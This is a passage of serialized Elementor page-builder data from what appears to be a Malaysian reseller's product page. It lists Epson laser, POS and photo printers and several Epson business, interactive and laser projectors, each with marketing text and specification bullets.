warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and 